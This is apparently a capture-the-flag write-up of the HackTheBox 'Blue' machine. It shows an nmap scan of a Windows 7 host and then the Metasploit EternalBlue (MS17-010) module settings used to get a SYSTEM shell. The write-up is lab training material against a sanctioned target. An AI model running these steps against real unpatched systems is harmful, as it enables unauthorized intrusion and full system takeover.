Post

HackTheBox - Blue

Posted Updated
By Nasrallah Baadi 2 min read

Description

Hello hackers, I hope you are doing well. We are doing Blue from HackTheBox.

Enumeration

nmap

We start a nmap scan using the following command: sudo nmap -sC -sV -T4 {target_IP}.

  • -sC: run all the default scripts.

  • -sV: Find the version of services running on the target.

  • -T4: Aggressive scan to provide faster results.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

Nmap scan report for 10.10.10.40 (10.10.10.40)
Host is up (0.14s latency).                                                    
Not shown: 991 closed tcp ports (reset) 
PORT      STATE SERVICE      VERSION                                                                                                                          
135/tcp   open  msrpc        Microsoft Windows RPC                                                                                                            
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn                     
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC           
49153/tcp open  msrpc        Microsoft Windows RPC             
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC                             
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC                                                                                                            
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-08-09T10:02:42
|_  start_date: 2022-08-09T09:57:35
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-08-09T11:02:39+01:00
|_clock-skew: mean: -19m57s, deviation: 34m37s, median: 1s

We have a windows machine with SMB open, as well as other things.

Foothold

Since the machine is named Blue and we have a windows machine, i directly though of the Eternal-Blue exploit.

Let’s fire up Metasploit and use the ms17_010_eternalblue module.

Now we need to set the required option.

1
2
3

set LHOST tun0

set rhosts 10.10.10.40

Type exploit to run the module.

Great! We got a shell, and we’re Authority System so no need for privilege escalation.

Thank you for taking the time to read my write-up, I hope you have learned something from this. If you have any questions or comments, please feel free to reach out to me. See you in the next hack :).

HackTheBox, Machines
hackthebox windows easy rce smb
This post is licensed under CC BY 4.0 by the author.